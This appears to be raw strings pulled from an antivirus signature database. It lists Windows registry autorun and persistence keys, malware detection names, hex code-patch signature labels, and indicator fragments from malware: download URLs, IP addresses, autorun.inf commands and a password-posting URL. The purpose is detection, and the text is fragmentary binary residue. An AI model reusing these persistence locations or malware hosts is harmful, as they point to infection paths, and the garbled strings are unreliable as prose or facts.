server\\install\\software\\microsoft\\windows\\currentversion\\runonce\\\\*MHKLM\\SOFTWARE\\Wow6432Node\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\Uninstall\\*(1)\\\\*MHKCU\\SOFTWARE\\Wow6432Node\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\Uninstall\\*(1)\\\\*M(16777227),HKLM\\SOFTWARE\\Wow6432Node\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\\*M(16777227),HKCU\\SOFTWARE\\Wow6432Node\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\\*Q(16777227),HKLM\\SOFTWARE\\Wow6432Node\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\\\\*Q(16777227),HKCU\\SOFTWARE\\Wow6432Node\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\\\\*X(16777227),HKLM\\SOFTWARE\\Wow6432Node\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCEEX\\*(1)\\\\*X(16777227),HKCU\\SOFTWARE\\Wow6432Node\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCEEX\\*(1)\\\\*U(16777227),HKLM\\SOFTWARE\\Wow6432Node\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNSERVICES\\\\*U(16777227),HKCU\\SOFTWARE\\Wow6432Node\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNSERVICES\\\\*Y(16777227),HKLM\\SOFTWARE\\Wow6432Node\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNSERVICESONCE\\\\*Y(16777227),HKCU\\SOFTWARE\\Wow6432Node\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNSERVICESONCE\\\\* HKLM\\software\\Wow6432Node\\microsoft\\windows nt\\currentversion\\terminal server\\install\\software\\microsoft\\windows\\currentversion\\run\\\\* HKCU\\software\\Wow6432Node\\microsoft\\windows nt\\currentversion\\terminal server\\install\\software\\microsoft\\windows\\currentversion\\run\\\\* HKLM\\software\\Wow6432Node\\microsoft\\windows nt\\currentversion\\terminal server\\install\\software\\microsoft\\windows\\currentversion\\runonce\\\\* HKCU\\software\\Wow6432Node\\microsoft\\windows nt\\currentversion\\terminal server\\install\\software\\microsoft\\windows\\currentversion\\runonce\\\\*MHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\*(infinite)THKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.htm\\UserChoice\\\\*UHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.html\\UserChoice\\\\*THKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.pdf\\UserChoice\\\\*THKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.doc\\UserChoice\\\\*UHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.docx\\UserChoice\\\\*THKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.ppt\\UserChoice\\\\*UHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.pptx\\UserChoice\\\\*THKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xls\\UserChoice\\\\*UHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xlsx\\UserChoice\\\\*WHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.accdbs\\UserChoice\\\\*OHKCU\\SOFTWARE\\Microsoft\\Windows\\Shell\\Associations\\UrlAssociations\\*(infinite)VHKCU\\SOFTWARE\\Microsoft\\Windows\\Shell\\Associations\\UrlAssociations\\http\\UserChoice\\\\*WHKCU\\SOFTWARE\\Microsoft\\Windows\\Shell\\Associations\\UrlAssociations\\https\\UserChoice\\\\*DHKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\\\*HHKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN\\\\*HHKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN\\\\*THKLM\\SOFTWARE\\Wow6432Node\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN\\\\*THKCU\\SOFTWARE\\Wow6432Node\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN\\\\*WHKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\ASSOCIATIONS\\\\LOWRISKFILETYPESWHKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\ASSOCIATIONS\\\\MODRISKFILETYPESHHKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\\SHELL\\\\*HHKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\\SHELL\\\\*JHKLM\\SOFTWARE\\MICROSOFT\\WINDO 65b32e3c7ac1 71b38107c3a6 92785a4f4c70 fa786f5a565e do_exhaustivehstr_64bit_rescan_adload &do_exhaustivehstr_64bit_rescan_adload do_exhaustivehstr_rescan_adload do_exhaustivehstr_rescan_adload 17a7862ebb098 HSTR:Adware:Win32/ZoomyLib.D 277802ddda7e ^%.data%d$ 3eb3b40dbf88 privacy \t privacy 1137878330f0d do_exhaustivehstr_64bit_rescan_istuni &do_exhaustivehstr_64bit_rescan_istuni do_exhaustivehstr_rescan_istuni do_exhaustivehstr_rescan_istuni !#pdfrtfole2link !#pdfrtfole2linkObMpAttributes .pdf->(rtf 1f89547dbbad ....=....u 8278aa752d33 SIGATTR:ExCheckInstalledAV SIGATTR:DirectoryWalkerVfs !#LUA:O97M/Emotet sgm_emotet_downloader_maldoc_ 2540889e6818 viracure \tviracure 2540b9a80441 41b3d34a9087 \\([^\\]+)%.exe$ 9c7804144ecf !#Lua:SingleFileHTAInZip !#Lua:SingleFileUrlInZip !#ALF:HackTool:PHP/Sirensheet.A!dha !#ALF:HackTool:PHP/Sirensheet.A!dhaObMpAttributes getpasswordpage.php 25899aa5126d 2689043d2cd1 268952f8097c 2d412787b3a9 35b3e47041e0 \\seal systems\\p2p_scripts\\ 3a784eaf4596 64786684f5fd epsecwr 71b3be4d5f4b 85789e0d7173 do_exhaustivehstr_64bit_rescan_swiminen (do_exhaustivehstr_64bit_rescan_swiminen do_exhaustivehstr_rescan_swiminen \"do_exhaustivehstr_rescan_swiminen 977847bbd54f 177800812033 177800812033Flags1 25b38bf05953 25b38bf05953IncludesBMLuaLib Behavior:Win32/CobaltStrike.D!sms \"Behavior:Win32/CobaltStrike.D!sms 65b341ec167c 65b341ec167cIncludesBMLuaLib Behavior:Win32/CobaltStrike.E!sms \"Behavior:Win32/CobaltStrike.E!sms a7b398eb9003 a7b398eb9003IncludesResearchData processinjection_source_dridex !#Lua:VhdxFile Lua:VhdxFile !#Lua:PowerShell/Ploty.C %->%[powershellb64%]%->%(base64%) \"%->%[powershellb64%]%->%(base64%) !#Lua:SingleFileDocInZip Ransom: RansomAsepCloudRegKeyScan ntrunkey:// runkey:// runonce:// runonceex:// 2db3eb6b3adf 8841a83ce076 8d78aa7ad856 9db3d5141137 19978e0755523 do_exhaustivehstr_64bit_rescan_soladaft (do_exhaustivehstr_64bit_rescan_soladaft do_exhaustivehstr_rescan_soladaft \"do_exhaustivehstr_rescan_soladaft MagicThreat_7ffe388b mavsigs\\luastandalone\\CallistoTestFile.debuglua 0mavsigs\\luastandalone\\CallistoTestFile.debuglua rempol RemovalPolicy SetRemovalPolicy 15b371a21aa5 \\services.exe !Small.AAAI http://69.31.84.223/ http://trackhits.cc/cnt -Software\\Microsoft\\Windows\\CurrentVersion\\Run] !Bagle.QR !Vundo.Z U U7. !Small.AAAJ !Agent.DPC !Agent.DPD !Slenfbot.HH !Bagle.QS !QQHelper.KA NSISdl.dll qqhelper.com/bindsoft11/bindsetup.exe %qqhelper.com/bindsoft11/bindsetup.exe qqhelper.com/bindsoft/bindsetup !Pushbot.BM !Slenfbot.HI !Slenfbot.HJ !Slenfbot.HK !Slenfbot.HL !Slenfbot.HM !Bagle.QT !Renos.gen!AE !Agent.GP \\systhecatmsg.gif \\sysmsgprocess \\systhecatmsg.gifGIFEXEINF%s w\\sysmsgprocess FirstName http://www.455465x.com/test/IP.asp FirstNamexinghttp://www.455465x.com/test/IP.asp &Password= ?Number= &Password=?Number=Q Tencent_QQBar sysmsgtart Tencent_QQBarsysmsgtartSOFT \\themsgmove.exe \\autorun.in QQ.exe\\themsgmove.exe\\autorun.in] <notepod.exe\\shell\\open\\command C:\\WINDOWS\\SYSTEM32\\rsvp.exe <notepod.exe\\shell\\open\\commandC:\\WINDOWS\\SYSTEM32\\rsvp.exe &\"C:\\WINDOWS\\SYSTEM32\\notepod.exe\" \"%1\" @Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.txt &{990B770D-62AE-5421-DA6D-16033B76258C} &{990B770D-62AE-5421-DA6D-16033B76258C}] !Small.BPN c:\\muma.exe c:\\123.exe c:\\muma.exec:\\123.exehttp:/ torun.inf shell\\open\\command=virus.exe \\virus.exe torun.infshell\\open\\command=virus.exe[AutoRun]\\virus.exe rentVersion\\Run \\usbvirus.exe rentVersion\\Run\\usbvirus.exeTest] !Conhook.H !Slenfbot.HN !Slenfbot.HO !Slenfbot.HP !Slenfbot.HQ !Slenfbot.HR !Pushbot.BN !Pushbot.BO hOB ] !Pushbot.BP !Bagle.QU !Slenfbot.HS !Slenfbot.HT !Slenfbot.HU !Renos.CN !Agent.AIB !Slenfbot.HV !Slenfbot.HW !Slenfbot.HX !Slenfbot.HY Wn^#1 !Slenfbot.HZ !Slenfbot.IA !Pushbot.gen!D !Bagle.QV -6=R[ !Bagle.QW !Matcash.KU cmcboo.com/ack.php?uid=00000000-0000-1033--ss0000&version=16&actionname=_regcheck&action=CheckBundle )) kernInstall.exe kernInst.exe wininstall.exe Installeur.exe install_words InetGet2 InetGet2] !Agent.BCI dZ.0K< !Pushbot.BQ !Pushbot.BR !Zlob.gen!AP 5Small.BKV !Small.BKV !Slenfbot.IB !Slenfbot.IC !Slenfbot.ID !Slenfbot.IE !Bagle.QX -6=RV !Renos.CO aabaalallert2fgllertqoadwindowsxV aabaalallert2fgllertqoadwindows] !Slenfbot.IF !Zlob.gen!AQ #0 ]cL !Zlob.gen!AR !Zlob.KG HC2A1C5CB-C0EF-4689-9436-F62CCA1C5383 ssft.dll dnsduepage.com sn.com/res Fpuresafetyhere.com/search.php?qq=%s !Slenfbot.IG !Slenfbot.IH !Slenfbot.II !Slenfbot.IJ !Slenfbot.IK !Zlob.gen!AS 5B0 0 !Zlob.gen!AT 4* 0 !Zlob.gen!AU !Small.AAAL !Slenfbot.IL !Slenfbot.IM QZ.CI !Slenfbot.IN !Slenfbot.IO !Bagle.QY -6=RN !Small.AAAM !Agent.ADH .x/txt.txt DownloadEnd Registered \\mshntfy16.dat \\mshd Registered\\mshntfy16.dat\\mshd] !Goldun.ZZR !Ldpinch.ZC !Agent.AAE !Bagle.QZ -6=RC !Bagle.RA !Slenfbot.IP !Slenfbot.IQ !Vundo.AA !Slenfbot.IR !Bagle.RB !Bagle.RC !Renos.CP !Alureon.gen!G HexDecoder HexEncoder LoadStr MD5Hash HexDecoderHexEncoderLoadStrMD5Hash DcryptDll.dll notepad.exe.dat calc.exe.dat freebsd.exe.dat Software\\VideoPorn linux linuxFFFDecrypt SOFTWARE INSTALLATION: Components bundled into the software may report to Licensor Nullsoft Install System] !Alureon.gen!H !Slenfbot.IS !Slenfbot.IT !C2Lop.E !Bagle.RD !Slenfbot.IU !Slenfbot.IV !Slenfbot.IW !Slenfbot.IX !Goldun.AH !Slenfbot.IY !Pushbot.BU q?I DU9 !Pushbot.BV !Small.AAAN !Slenfbot.IZ !Slenfbot.JA !Slenfbot.JB !Small.AJA !Small.AJB http://www.vivendosemfronteiras.com/torpedo/sms/foto/vivo/fototorpedo/ ?0Ohttp://www.vivendosemfronteiras.com/torpedo/sms/foto/vivo/fototorpedo/ !Small.AJC ?0#G, !Small.AJD !Small.AJE !Small.AJF !Small.AJG !Bagle.RE .cY}: !Small.BKX F1o! 00 F1o! !Wantvi.G !Bagle.RF -6=R ( !Slenfbot.JC !Slenfbot.JD !Pushbot.BW !Slenfbot.JE !Renos.CQ CLEAN] !Small.XJ CURRENT_USER NtOpenSection CURRENT_USER\\Device\\PhysicalMemoryntdllNtOpenSectionKeServiceDescriptorTable Mozilla/4.0 (compatible) svchost.exeMozilla/4.0 (compatible)] !Ldpinch.IE Victim is Online. project1.exe 5SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon 192.168.0. 151.164.1.8 212.101.97.7 151.164.23.201 ege.edu.tr www.bigglook.com systemdna@Yahoo.com systemdna@Yahoo.com] !Agent.ACG verysilentd d AutoInsQyuled &{3B7CBEE9-89A2-449c-B88E-22498FBAB005} \tsetup.exe AutoInsQyuled&{3B7CBEE9-89A2-449c-B88E-22498FBAB005} QyuleInstall.exe !http://update.qyule.com/setup.exe http://218.204.253.145/setup.exe http://218.204.253.145/setup.exe] !Zlob.ANA The computer has been infected!! myfirstgaysex.com/ 2Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) ShellExecuteExA !Pushbot.BX !Pushbot.BY GT>@] !Agent.ZAM !Small.AAAO !Zlob.gen!AV SVW3 VVVVjdjd {6BF52A52-394A-11D3-B153-00C04F79FAA6} Software\\NetProject] !Slenfbot.JF !Bagle.RG !Bagle.RH -6=Rp !Wantvi.A !Wantvi.H !Harnig.gen!L !Goldun.ZZS !Goldun.ZZT !Goldun.ZZU !Goldun.ZZV !Small.NX ^R>?0 !Virtumonde.N !Slenfbot.JH !Slenfbot.JI !Slenfbot.JG !Agent.GQ 200.206.97.42 ACTIVX.exe \t http://upload.exe \\msjava32\\%s.key C:\\windows\\xxxzzzyyy.exe UnhookWindowsHookExd UnhookWindowsHookExd! !Small.CAF Ek)2& 71b^nq zg8n6 YT`;S6 G\\v9v \"6%%6 9c#.;sg hrs5 2 RJS 4K6Wb6 /s#%q swhAN6 [Mp; 4 7B\\zy`F )z;sl T} \t'4v; uj`B8( % }dJ *,yCp vv@Yf \"wB!>la` A]pw(|] .#VzO\\!k .lSup ,1^:Xq d@e@t \"V.), +|qx\" 1U8v@4 bJ]4~N= (8$7[ VKo=w iy>)%($D, Q^.! Zo\\MA wEe=2 G8J\"L t wm\t +7U8NT MfAC'EW1d lNzq? %j*Jq \"MC.V6 PZh0s@(z %qhTK$ \t%4`i \"ZdP{ %|s!P 3 320 @sU+] >]g=-hf ePVx2 ~xiGX ElqN\t !#attrmatch_codepatch_EIP_0000000E_043 I% !#attrmatch_codepatch_EIP_0000000E_043 I% !#attrmatch_codepatch_EIP_00000010_EB !#attrmatch_codepatch_EIP_00000012_0A I% !#attrmatch_codepatch_EIP_00000012_0A !#attrmatch_codepatch_EIP_00000012_EBU I% !#attrmatch_codepatch_EIP_00000012_EBU SVWt _3 !#attrmatch_codepatch_EIP_00000012_EB_^ I% !#attrmatch_codepatch_EIP_00000012_EB_^ I% !#attrmatch_codepatch_EIP_00000012_EB !#attrmatch_codepatch_EIP_00000018_FF I% !#attrmatch_codepatch_EIP_00000018_FF !#attrmatch_codepatch_eip_0000000B_EB I% !#attrmatch_codepatch_eip_0000000B_EB !#attrmatch_codepatch_eip_00000011_90 I% !#attrmatch_codepatch_eip_00000011_90 C =oleFt !#PEBMPPAT:VirTool:Win32/ModifiedFsg.A !#attrmatch_codepatch_EIP_00000003_90E9 !#attrmatch_codepatch_EIP_00000004_9090XH !#attrmatch_codepatch_EIP_00000005_EB12 !#attrmatch_codepatch_EIP_00000007_9090F !#attrmatch_codepatch_EIP_0000000B_33D2 !#attrmatch_codepatch_EIP_0000000B_9090H !#attrmatch_codepatch_EIP_0000000C_9090Y !#attrmatch_codepatch_EIP_0000000E_EB0DYXQQQj !#attrmatch_codepatch_EIP_00000015_9090 !#attrmatch_codepatch_EIP_00000019_9090U !#attrmatch_codepatch_EIP_0000001b_9090 !#attrmatch_codepatch_eip_00000014_29DEa !#PEBMPAT:VirTool:Win32/Obfuscator.ACV!EP !#attrmatch_codepatch_EIP_00000000_33c990 !#attrmatch_codepatch_EIP_00000010_010000 !#attrmatch_codepatch_EIP_00000013_909090` !#attrmatch_codepatch_EIP_0000001A_6AEE59 !#attrmatch_codepatch_EIP_00000000_92424890BHu !#attrmatch_codepatch_EIP_00000002_01000000 !#attrmatch_codepatch_EIP_00000011_02000000 !#attrmatch_codepatch_EIP_00000011_31C09090903 !#attrmatch_codepatch_EIP_00000007_909090909090F !#attrmatch_codepatch_EIP_00000007_909090909090G !#PEBMPAT:Deep_Analysis3 /!#PEBMPAT:Deep_Analysis3 !#PEBMPAT:Obfuscator.CW /!#PEBMPAT:Obfuscator.CW SVWQd )!#attrmatch_DTBranch_EIP_0_r1 QjAVj !#PEBMPAT:Vundo_StrFormatKBSizeWf J &!#PEBMPAT:Vundo_StrFormatKBSizeWf !#PEBMPAT:lua_codepatch_ursnif_32 J!%!#PEBMPAT:lua_codepatch_ursnif_32 j@h0h J%!!#attrmatch_codepatch_EIP_00000003_EB !#attrmatch_codepatch_EIP_0000000F_EB J%!!#attrmatch_codepatch_EIP_0000000F_EB J%!!#attrmatch_codepatch_EIP_00000010_EB !#attrmatch_codepatch_EIP_00000011_043 J%!!#attrmatch_codepatch_EIP_00000011_043 !#attrmatch_codepatch_EIP_00000015_EBU J%!!#attrmatch_codepatch_EIP_00000015_EBU !#attrmatch_codepatch_EIP_0000001A_8C J%!!#attrmatch_codepatch_EIP_0000001A_8C !#attrmatch_codepatch_EIP_0000001C_FF J%!!#attrmatch_codepatch_EIP_0000001C_FF !#attrmatch_codepatch_EIP_0000001D_EB J%!!#attrmatch_codepatch_EIP_0000001D_EB ahdlL ahdlLhame.hiefrT !#attrmatch_codepatch_EIP_00000048_EB J%!!#attrmatch_codepatch_EIP_00000048_EB !#attrmatch_codepatch_EIP_00000C78_85 J%!!#attrmatch_codepatch_EIP_00000C78_85 D$,UI !#attrmatch_codepatch_EIP_000069C9_01 J%!!#attrmatch_codepatch_EIP_000069C9_01 !#attrmatch_codepatch_EIP_0000000C_9090 !#attrmatch_codepatch_EIP_0000000D_EB0C !#attrmatch_codepatch_EIP_0000000b_eb0e !#attrmatch_codepatch_EIP_00000011_9090PSj !#attrmatch_codepatch_EIP_00000012_90E9 !#attrmatch_codepatch_EIP_00000015_9090j<Y !#attrmatch_codepatch_EIP_00000018_0290 !#attrmatch_codepatch_EIP_00000019_9090 !#attrmatch_codepatch_EIP_0000001B_4190SQ !#attrmatch_codepatch_EIP_00000012_909090X !#attrmatch_codepatch_EIP_00000004_01000000O !#attrmatch_codepatch_EIP_00000010_01000000 !#attrmatch_codepatch_EIP_00000011_01000000RQ !#attrmatch_codepatch_EIP_0000000C_90909031C031DBI !#attrmatch_codepatch_EIP_00000000_8907909090909090909090P J9 J9 !#QuickBatch_WriteSVWQ 5!#QuickBatch_WriteSVWQ !#PEBMPAT:Disable_SEH_Limitd ,!#PEBMPAT:Disable_SEH_Limitd !#PEBMPAT:VirTool:Win32/KME.2` *!#PEBMPAT:VirTool:Win32/KME.2` !#attrmatch_DTBranch_EIP_39_r1 )!#attrmatch_DTBranch_EIP_39_r1 !#attrmatch_DTBranch_EIP_C5_r1 )!#attrmatch_DTBranch_EIP_C5_r1 K!&!#PEBMPAT:lua_codepatch_ursnif_32 K!&!#PEBMPAT:lua_codepatch_ursnif_64H K!&!#PEBMPAT:lua_codepatch_ursnif_64QRAPSVW !#attrmatch_codepatch_EIP_00000005_EB=1{ K%\"!#attrmatch_codepatch_EIP_00000005_EB=1{ !#attrmatch_codepatch_EIP_00000005_EB= K%\"!#attrmatch_codepatch_EIP_00000005_EB= !#attrmatch_codepatch_EIP_00000007_74K K%\"!#attrmatch_codepatch_EIP_00000007_74K CU\t4$X K%\"!#attrmatch_codepatch_EIP_00000007_EB !#attrmatch_codepatch_EIP_00000008_00 K%\"!#attrmatch_codepatch_EIP_00000008_00 K%\"!#attrmatch_codepatch_EIP_00000009_EB !#attrmatch_codepatch_EIP_0000000B_00 K%\"!#attrmatch_codepatch_EIP_0000000B_00 K%\"!#attrmatch_codepatch_EIP_0000000D_EB !#attrmatch_codepatch_EIP_0000000E_00 K%\"!#attrmatch_codepatch_EIP_0000000E_00 !#attrmatch_codepatch_EIP_00000010_043 K%\"!#attrmatch_codepatch_EIP_00000010_043 K%\"!#attrmatch_codepatch_EIP_00000012_EB !#attrmatch_codepatch_EIP_00000015_73 K%\"!#attrmatch_codepatch_EIP_00000015_73 !#attrmatch_codepatch_EIP_00000015_75P K%\"!#attrmatch_codepatch_EIP_00000015_75P K%\"!#attrmatch_codepatch_EIP_00000017_EB !#attrmatch_codepatch_EIP_0000001A_74 K%\"!#attrmatch_codepatch_EIP_0000001A_74 K%\"!#attrmatch_codepatch_EIP_0000001C_FF !#attrmatch_codepatch_EIP_0000001D_00f K%\"!#attrmatch_codepatch_EIP_0000001D_00f !#attrmatch_codepatch_EIP_0000001E_00 K%\"!#attrmatch_codepatch_EIP_0000001E_00 !#attrmatch_codepatch_EIP_00000022_17 K%\"!#attrmatch_codepatch_EIP_00000022_17 !#attrmatch_codepatch_EIP_00000026_00f K%\"!#attrmatch_codepatch_EIP_00000026_00f !#attrmatch_codepatch_eip_00000008_EB K%\"!#attrmatch_codepatch_eip_00000008_EB !#attrmatch_codepatch_EIP_00000006_90E9 K' !#attrmatch_codepatch_EIP_00000006_90E9 !#attrmatch_codepatch_EIP_0000000A_9090XZYZ K' !#attrmatch_codepatch_EIP_0000000A_9090XZYZ RQRP3 !#attrmatch_codepatch_EIP_0000000A_9090YXZX K' !#attrmatch_codepatch_EIP_0000000A_9090YXZX PRPQ3 !#attrmatch_codepatch_EIP_0000000A_9090YZXZ K' !#attrmatch_codepatch_EIP_0000000A_9090YZXZ RPRQ3 K' !#attrmatch_codepatch_EIP_0000000A_9090 K' !#attrmatch_codepatch_EIP_0000000C_9090Y !#attrmatch_codepatch_EIP_0000000D_9090Y K' !#attrmatch_codepatch_EIP_0000000D_9090Y !#attrmatch_codepatch_EIP_00000011_9090U K' !#attrmatch_codepatch_EIP_00000011_9090U !#attrmatch_codepatch_EIP_00000015_90E9 K' !#attrmatch_codepatch_EIP_00000015_90E9 K' !#attrmatch_codepatch_EIP_00000017_9090 !#attrmatch_codepatch_EIP_0000001E_90903 K' !#attrmatch_codepatch_EIP_0000001E_90903 K' !#attrmatch_codepatch_EIP_0000001b_9090 !#attrmatch_codepatch_EIP_0000001d_9090 K' !#attrmatch_codepatch_EIP_0000001d_9090 !#attrmatch_codepatch_EIP_0000001e_9090j K' !#attrmatch_codepatch_EIP_0000001e_9090jjjjjjjjjjjj !#attrmatch_codepatch_EIP_00000033_9090j K' !#attrmatch_codepatch_EIP_00000033_9090j !#attrmatch_codepatch_EIP_00000006_00000000WY !#attrmatch_codepatch_EIP_00000016_01000000QUVh !#attrmatch_codepatch_EIP_00000016_01000000 !#PEBMPPAT:TrojanDownloader:Win32/Cutwail.AM% !#attrmatch_codepatch_EIP_00000010_909090909090U !#attrmatch_codepatch_EIP_0000001b_909090909090 !#attrmatch_codepatch_EIP_0000000A_49BA5634FD0401D1 !#ALFPER:PEBMPAT:BrowserModifier:Win32/SoctuseerObfuscator.B !EPL_4.x @!EPL_4.x 1!#PEBMPAT:Deep_Analysis -!#PEBMPAT:Disable_SEH_Limit !#PEBMPAT:Waledac_exception -!#PEBMPAT:Waledac_exception +!#attrmatch_DTBranch_EIP_0_r1 !#attrmatch_DTBranch_EIP_3A_r0 *!#attrmatch_DTBranch_EIP_3A_r0 G9t$Tu !#PEBMPAT:VirTool:Win32/Obfuscator.QO L%#!#PEBMPAT:VirTool:Win32/Obfuscator.QO !#PEBMPAT:VirTool:Win32/Obfuscator.YVU L%#!#PEBMPAT:VirTool:Win32/Obfuscator.YVU L%#!#attrmatch_codepatch_EIP_00000003_EB L%#!#attrmatch_codepatch_EIP_00000004_EB !#attrmatch_codepatch_EIP_0000000C_EB L%#!#attrmatch_codepatch_EIP_0000000C_EB !#attrmatch_codepatch_EIP_0000000D_043 L%#!#attrmatch_codepatch_EIP_0000000D_043 L%#!#attrmatch_codepatch_EIP_0000000E_EB !#attrmatch_codepatch_EIP_00000011_073 L%#!#attrmatch_codepatch_EIP_00000011_073 !#attrmatch_codepatch_EIP_00000016_75P L%#!#attrmatch_codepatch_EIP_00000016_75P !#attrmatch_codepatch_EIP_00000017_75P L%#!#attrmatch_codepatch_EIP_00000017_75P L%#!#attrmatch_codepatch_EIP_00000017_EB !#attrmatch_codepatch_EIP_0000001C_EB L%#!#attrmatch_codepatch_EIP_0000001C_EB !#attrmatch_codepatch_EIP_0000001F_EB L%#!#attrmatch_codepatch_EIP_0000001F_EB !#attrmatch_codepatch_EIP_00000001_EB1D`1 L'!!#attrmatch_codepatch_EIP_00000001_EB1D`1 !#attrmatch_codepatch_EIP_00000002_EB10 L'!!#attrmatch_codepatch_EIP_00000002_EB10 L'!!#attrmatch_codepatch_EIP_0000000F_9090 !#attrmatch_codepatch_EIP_00000017_9090U L'!!#attrmatch_codepatch_EIP_00000017_9090U L'!!#attrmatch_codepatch_EIP_00000018_9090 !#attrmatch_codepatch_EIP_00000018_90E9 L'!!#attrmatch_codepatch_EIP_00000018_90E9 !#attrmatch_codepatch_EIP_0000001A_90E9 L'!!#attrmatch_codepatch_EIP_0000001A_90E9 !#attrmatch_codepatch_EIP_0000001B_33C0 L'!!#attrmatch_codepatch_EIP_0000001B_33C0 !#attrmatch_codepatch_EIP_0000001C_EB0A=R L'!!#attrmatch_codepatch_EIP_0000001C_EB0A=R L'!!#attrmatch_codepatch_EIP_0000001E_90903 L'!!#attrmatch_codepatch_EIP_0000001E_9090 !#attrmatch_codepatch_EIP_0000001E_EB00+E L'!!#attrmatch_codepatch_EIP_0000001E_EB00+E !#attrmatch_codepatch_EIP_00000020_9090 L'!!#attrmatch_codepatch_EIP_00000020_9090 !#attrmatch_codepatch_EIP_00000026_9090h L'!!#attrmatch_codepatch_EIP_00000026_9090h !#attrmatch_codepatch_EIP_0000002D_9090 L'!!#attrmatch_codepatch_EIP_0000002D_9090 !#attrmatch_codepatch_EIP_00000002_010000V !#attrmatch_codepatch_EIP_FFFFFFFD_000000 !#attrmatch_codepatch_EIP_00000004_02000000ZB !#attrmatch_codepatch_EIP_00000007_05000000U !#attrmatch_codepatch_EIP_00000011_89c69090 !#attrmatch_codepatch_EIP_00000014_01000000 !#attrmatch_codepatch_EIP_00000017_19BFFEFF !#attrmatch_codepatch_EIP_00000019_89D39090M !#attrmatch_codepatch_EIP_00000000_33C0605090`S !#attrmatch_codepatch_EIP_00000008_B802000000 !#attrmatch_codepatch_EIP_00000003_909090909090 !#attrmatch_codepatch_EIP_00000000_648B4121909090@d9A!u !#attrmatch_codepatch_EIP_00000000_89C039C090909090 !#attrmatch_codepatch_EIP_0000000E_9090909090909090 !#attrmatch_codepatch_EIP_00000000_8145F40000010090909090 !#attrmatch_codepatch_EIP_00000000_8145F41010010090909090 !#attrmatch_codepatch_EIP_00000000_8145F42020020090909090 !#PEBMPAT:Deep_AnalysisV 2!#PEBMPAT:Deep_AnalysisV 2!#PEBMPAT:Deep_Analysis !#attrmatch_DTBranch_EIP_5_r1 ,!#attrmatch_DTBranch_EIP_5_r1 !#attrmatch_DTBranch_EIP_17_r1 +!#attrmatch_DTBranch_EIP_17_r1 !#attrmatch_codepatch_EIP_0000000B_EBa M%$!#attrmatch_codepatch_EIP_0000000B_EBa M%$!#attrmatch_codepatch_EIP_0000000E_EB !#attrmatch_codepatch_EIP_0000000e_1a+ M%$!#attrmatch_codepatch_EIP_0000000e_1a+ M`<3u !#attrmatch_codepatch_EIP_00000010_07 M%$!#attrmatch_codepatch_EIP_00000010_07 M%$!#attrmatch_codepatch_EIP_00000016_75P M%$!#attrmatch_codepatch_EIP_00000017_75P M%$!#attrmatch_codepatch_EIP_00000017_EB mime\\database\\charset\\ecma-118 iso-8859-7 mime\\database\\charset\\elot_928 |\"CertificateAuthority.ServerPolicy |\"ReplicateCatalog.ReplicateCatalog .ReplicateCatalog Class |-CLSID\\{00000305-0000-0000-C000-000000000046} AntiMoniker |-clsid\\{00000303-0000-0000-c000-000000000046} FileMoniker |-clsid\\{00000304-0000-0000-c000-000000000046} ItemMoniker |-clsid\\{57651662-ce3e-11d0-8d77-00c04fc99d61} CmdFileIcon |-clsid\\{6a08cf80-0e18-11cf-a24d-0020afd79767} ACM Wrapper |-clsid\\{79eac9e0-baf9-11ce-8c82-00aa004ba90b} URL Moniker |-clsid\\{8596e5f0-0da5-11d0-bd21-00a0c911ce86} File Writer |1interface\\{00000505-0000-0010-8000-00aa006d2ea4} Field15 |1interface\\{00000562-0000-0010-8000-00aa006d2ea4} _Record |1interface\\{00000565-0000-0010-8000-00aa006d2ea4} _Stream |1interface\\{22813757-8bd3-11d0-b4ef-00a0c9138ca4} Members |1interface\\{ef636393-f343-11d0-9477-00c04fd36226} IDBComm |5CLSID\\{13709620-C279-11CE-A49E-444553540000}\\Version |5CLSID\\{22D6F312-B0F6-11D0-94AB-0080C74C7E95}\\Version 